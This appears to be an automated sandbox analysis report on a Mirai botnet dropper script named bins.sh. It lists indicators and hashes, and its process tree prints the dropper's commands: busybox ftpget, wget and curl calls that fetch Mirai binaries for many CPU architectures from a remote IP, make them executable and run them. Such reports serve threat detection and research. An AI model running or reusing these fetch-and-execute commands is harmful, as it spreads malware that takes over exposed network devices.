Analysis
-
max time kernel
149s -
max time network
153s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
-
submitted
09-08-2024 10:43
General
-
Target
bins.sh
-
Size
10KB
-
MD5
f064b93641da57ab1b510a06a284bacd
-
SHA1
77ebf690333960186de349f1ccd1d6ac9df3748a
-
SHA256
1a8b53d206810f02a59c8a0ce14bd3ff49a31f78802ef24e0a3e63fd4e857b2d
-
SHA512
02e4910ae45ca7e75053ede74511bcf417a72a1d15fb60c2e44bae30320b0e89dd98d383aefec312b23dca671892d0e1d6991fb45c5d5af0bcf21d84388c0e54
-
SSDEEP
48:pccGoQSoGFIAw6YQFaak0xrr6TofZKYn6ra/oSY9QJgnmlt6YLupG:+cGoQSoGFhw6ZFaakwrhcsd/+wa4t
Malware Config
Extracted
Protocol: ftp- Host:
154.216.19.139 - Port:
21 - Username:
anonymous - Password:
busybox@
Extracted
Protocol: ftp- Host:
secure.microsoftconnect.net - Port:
21 - Username:
anonymous - Password:
busybox@
Extracted
mirai
MIRAI
Extracted
mirai
MIRAI
secure.microsoftconnect.net
Signatures
-
Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
-
Contacts a large (21042) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Deletes itself 4 IoCs
-
Executes dropped EXE 15 IoCs
-
Modifies Watchdog functionality 1 TTPs 8 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
-
Enumerates active TCP sockets 1 TTPs 4 IoCs
Gets active TCP sockets from /proc virtual filesystem.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Changes its process name 4 IoCs
-
Reads system network configuration 1 TTPs 4 IoCs
Uses contents of /proc filesystem to enumerate network settings.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 32 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵
-
/bin/rmrm starter2⤵
-
-
/bin/busyboxbusybox ftpget 154.216.19.139 starter /bins/starter.sh2⤵
- Writes file to tmp directory
-
-
/bin/shsh ./starter2⤵
-
/bin/mkdirmkdir /tmp/azvFgdBZ3⤵
-
-
/bin/busyboxbusybox ftpget 154.216.19.139 dvrHelper /bins/mirai.bin3⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 0755 ./dvrHelper3⤵
-
-
/tmp/azvFgdBZ/dvrHelper./dvrHelper3⤵
- Deletes itself
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
-
-
/bin/busyboxbusybox ftpget 154.216.19.139 dvrHelper /bins/mirai.armv4l3⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 0755 ./dvrHelper3⤵
-
-
/tmp/azvFgdBZ/dvrHelper./dvrHelper3⤵
- Executes dropped EXE
-
-
/bin/busyboxbusybox ftpget 154.216.19.139 dvrHelper /bins/mirai.armv5l3⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 0755 ./dvrHelper3⤵
-
-
/tmp/azvFgdBZ/dvrHelper./dvrHelper3⤵
- Executes dropped EXE
-
-
/bin/busyboxbusybox ftpget 154.216.19.139 dvrHelper /bins/mirai.armv6l3⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 0755 ./dvrHelper3⤵
-
-
/tmp/azvFgdBZ/dvrHelper./dvrHelper3⤵
- Executes dropped EXE
-
-
/bin/busyboxbusybox ftpget 154.216.19.139 dvrHelper /bins/mirai.armv7l3⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 0755 ./dvrHelper3⤵
-
-
/tmp/azvFgdBZ/dvrHelper./dvrHelper3⤵
- Executes dropped EXE
-
-
/bin/busyboxbusybox ftpget 154.216.19.139 dvrHelper /bins/mirai.i5863⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 0755 ./dvrHelper3⤵
-
-
/tmp/azvFgdBZ/dvrHelper./dvrHelper3⤵
- Deletes itself
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
-
-
/bin/busyboxbusybox ftpget 154.216.19.139 dvrHelper /bins/mirai.i6863⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 0755 ./dvrHelper3⤵
-
-
/tmp/azvFgdBZ/dvrHelper./dvrHelper3⤵
- Deletes itself
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
-
-
/bin/busyboxbusybox ftpget 154.216.19.139 dvrHelper /bins/mirai.m68k3⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 0755 ./dvrHelper3⤵
-
-
/tmp/azvFgdBZ/dvrHelper./dvrHelper3⤵
- Executes dropped EXE
-
-
/bin/busyboxbusybox ftpget 154.216.19.139 dvrHelper /bins/mirai.mips3⤵
-
-
/bin/busyboxbusybox ftpget 154.216.19.139 dvrHelper /bins/mirai.mipsel3⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 0755 ./dvrHelper3⤵
-
-
/tmp/azvFgdBZ/dvrHelper./dvrHelper3⤵
- Executes dropped EXE
-
-
/bin/busyboxbusybox ftpget 154.216.19.139 dvrHelper /bins/mirai.powerpc3⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 0755 ./dvrHelper3⤵
-
-
/tmp/azvFgdBZ/dvrHelper./dvrHelper3⤵
- Executes dropped EXE
-
-
/bin/busyboxbusybox ftpget 154.216.19.139 dvrHelper /bins/mirai.sh43⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 0755 ./dvrHelper3⤵
-
-
/tmp/azvFgdBZ/dvrHelper./dvrHelper3⤵
- Executes dropped EXE
-
-
/bin/busyboxbusybox ftpget 154.216.19.139 dvrHelper /bins/mirai.sparc3⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 0755 ./dvrHelper3⤵
-
-
/tmp/azvFgdBZ/dvrHelper./dvrHelper3⤵
- Executes dropped EXE
-
-
/bin/busyboxbusybox ftpget 154.216.19.139 dvrHelper /bins/mirai.x86_643⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 0755 ./dvrHelper3⤵
-
-
/tmp/azvFgdBZ/dvrHelper./dvrHelper3⤵
- Deletes itself
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
-
-
/bin/busyboxbusybox ftpget 154.216.19.139 dvrHelper /bins/mirai.gnueabihf3⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 0755 ./dvrHelper3⤵
-
-
/tmp/azvFgdBZ/dvrHelper./dvrHelper3⤵
- Executes dropped EXE
-
-
/bin/busyboxbusybox ftpget 154.216.19.139 dvrHelper /bins/mirai.arc3⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 0755 ./dvrHelper3⤵
-
-
/tmp/azvFgdBZ/dvrHelper./dvrHelper3⤵
- Executes dropped EXE
-
-
-
/bin/rmrm dvrHelper2⤵
-
-
/usr/bin/wgetwget http://web.archive.org/web/20240808120223if_/http://154.216.19.139/bins/mirai.bin -O dvrHelper2⤵
- Writes file to tmp directory
-
-
/bin/rmrm dvrHelper2⤵
-
-
/usr/bin/wgetwget http://web.archive.org/web/20240808120646if_/http://154.216.19.139/bins/mirai.armv4l -O dvrHelper2⤵
- Writes file to tmp directory
-
-
/bin/rmrm dvrHelper2⤵
-
-
/usr/bin/wgetwget http://web.archive.org/web/20240808120945if_/http://154.216.19.139/bins/mirai.armv5l -O dvrHelper2⤵
- Writes file to tmp directory
-
-
/bin/rmrm dvrHelper2⤵
-
-
/usr/bin/wgetwget http://web.archive.org/web/20240808121041if_/http://154.216.19.139/bins/mirai.armv6l -O dvrHelper2⤵
- Writes file to tmp directory
-
-
/bin/rmrm dvrHelper2⤵
-
-
/usr/bin/wgetwget http://web.archive.org/web/20240808121121if_/http://154.216.19.139/bins/mirai.armv7l -O dvrHelper2⤵
- Writes file to tmp directory
-
-
/bin/rmrm dvrHelper2⤵
-
-
/usr/bin/wgetwget http://web.archive.org/web/20240808121230if_/http://154.216.19.139/bins/mirai.i586 -O dvrHelper2⤵
- Writes file to tmp directory
-
-
/bin/rmrm dvrHelper2⤵
-
-
/usr/bin/wgetwget http://web.archive.org/web/20240808121308if_/http://154.216.19.139/bins/mirai.i686 -O dvrHelper2⤵
- Writes file to tmp directory
-
-
/bin/rmrm dvrHelper2⤵
-
-
/usr/bin/wgetwget http://web.archive.org/web/20240808121347if_/http://154.216.19.139/bins/mirai.m68k -O dvrHelper2⤵
- Writes file to tmp directory
-
-
/bin/rmrm dvrHelper2⤵
-
-
/usr/bin/wgetwget http://web.archive.org/web/20240808121419if_/http://154.216.19.139/bins/mirai.mips -O dvrHelper2⤵
- Writes file to tmp directory
-
-
/bin/rmrm dvrHelper2⤵
-
-
/usr/bin/wgetwget http://web.archive.org/web/20240808121832if_/http://154.216.19.139/bins/mirai.mipsel -O dvrHelper2⤵
- Writes file to tmp directory
-
-
/bin/rmrm dvrHelper2⤵
-
-
/usr/bin/wgetwget http://web.archive.org/web/20240808122159if_/http://154.216.19.139/bins/mirai.powerpc -O dvrHelper2⤵
- Writes file to tmp directory
-
-
/bin/rmrm dvrHelper2⤵
-
-
/usr/bin/wgetwget http://web.archive.org/web/20240808122448if_/http://154.216.19.139/bins/mirai.sh4 -O dvrHelper2⤵
- Writes file to tmp directory
-
-
/bin/rmrm dvrHelper2⤵
-
-
/usr/bin/wgetwget http://web.archive.org/web/20240808122636if_/http://154.216.19.139/bins/mirai.sparc -O dvrHelper2⤵
- Writes file to tmp directory
-
-
/bin/rmrm dvrHelper2⤵
-
-
/usr/bin/wgetwget http://web.archive.org/web/20240808122755if_/http://154.216.19.139/bins/mirai.x86_64 -O dvrHelper2⤵
- Writes file to tmp directory
-
-
/bin/rmrm dvrHelper2⤵
-
-
/usr/bin/wgetwget http://web.archive.org/web/20240808122936if_/http://154.216.19.139/bins/mirai.gnueabihf -O dvrHelper2⤵
- Writes file to tmp directory
-
-
/bin/rmrm dvrHelper2⤵
-
-
/usr/bin/wgetwget http://web.archive.org/web/20240808123114if_/http://154.216.19.139/bins/mirai.arc -O dvrHelper2⤵
- Writes file to tmp directory
-
-
/bin/rmrm dvrHelper2⤵
-
-
/usr/bin/curlcurl http://web.archive.org/web/20240808120223if_/http://154.216.19.139/bins/mirai.bin -o dvrHelper2⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
914KB
MD56a98f1f740434bb0d3da9a431bb7fefd
SHA14d7242cbfa380596d0292c9c9be847862cdb24f1
SHA256ad3c19afec823def5b53f480eb919b75129dc820dbead758ecc5097d3ddbacef
SHA5125b76a071270d7c213639bb111903f8c74445a7b5e8af88aab04957c6586332dce7c866a3031ea78544fcffbc3e39b6c90d712d6ab06bbf97a0418d9290de7558
-
Filesize
59KB
MD5b480aeaa8aea4c14f64a18c173446b7e
SHA1f32fc9d6287db05d9a48a948f4aa2ba04e4b73a4
SHA2560ab267b78d6c6d1faada747adba0da9f57ce3a7dc1b9a4e968f313dc41d6add1
SHA512589f02b57d842c5f348c3f50f32a2e8c45ee30d25f61524a58f590780a3558578b4780bb93a69a2419aab7bcf47a929801c77c6e63b8ade436fcc31bb546f4ba
-
Filesize
52KB
MD5239a2559915a73284cc52944dd9c9643
SHA18c19ed6b2f40232bd38ec7013ced9b8c9ffa7a3f
SHA256c8f07011c9d3cd46cdc9d1bc9cef48a36c14defb0f94dd1d3a67e085a6fac55a
SHA5120eb5b42f41718019a78111e9367e65668c3bcda0f1d469c7ea15fdbef517135ca616cf1bb780f38a835bbed4c932be43d0a9d9152508e866116f6e534c833eec
-
Filesize
69KB
MD555d936e9afa4b869c8f6fe345c217f1e
SHA1ffdfbc85c3452cd781a0df555f2a7bad07d86fce
SHA256b1229bb669f3c7578cbc77e41dec812ec366394bcb344c7c65a5e8fab5fc5164
SHA512e3e7d62dc810c66ac5c973a4eb6931c251715f065c95d4f5397405c3e32463f5d3732d41f1187c904765c09e6936a0ff8ca0ae2e6f7aa55d0e103d0dde4acdf6
-
Filesize
87KB
MD547d8efca2764e49c87e24ec8701a426e
SHA1b3a085cd33cbc24931d9f03bcc13e6e41bb8f44f
SHA25659560da4441b5e239b5d330890fd163bebc42f3fc6b4b113d8332935b6da0a87
SHA5124fe12e641522a19f0d25e0380c1f99cca1694257b6e4e038adb561ac78cc20e1c2ca772237282ac24c0bfceac4a9797e96c040b6aea5dfbfea655919c8ff02e8
-
Filesize
360KB
MD57a81da52d99ff2fe3feacccab9ca5076
SHA1941ad2b09c6f1de8f9ece786dded59279a51adcc
SHA256575e7ba6c123a339ef5989852abfbaea24af6df81f4321ea80e8a5d3fd60482f
SHA512e7146e94216296bc5d0929f9d41688f461fa631f81078040514917f4c397026ee2feba6f04e8fd4a42859a79a85c6c2a9f34404179ae5beeff769700c4cf0295
-
Filesize
1KB
MD57f2ff2a38336a889de920d227574d543
SHA158d61a19d9785a51d379547cfbd8326e7474535d
SHA256f2232fae5a51d77cd7d00264806f08b0435f320b2d81530d7a87fe2fa13982f8
SHA512ca8d1b911f664f69593da1b5b8a43ea00d324ca74df870eb1bac356eb240492af5e1a5aed8d1fda1c1266adfb577c05788ccfdd6ba387e132e84ad75eefc9feb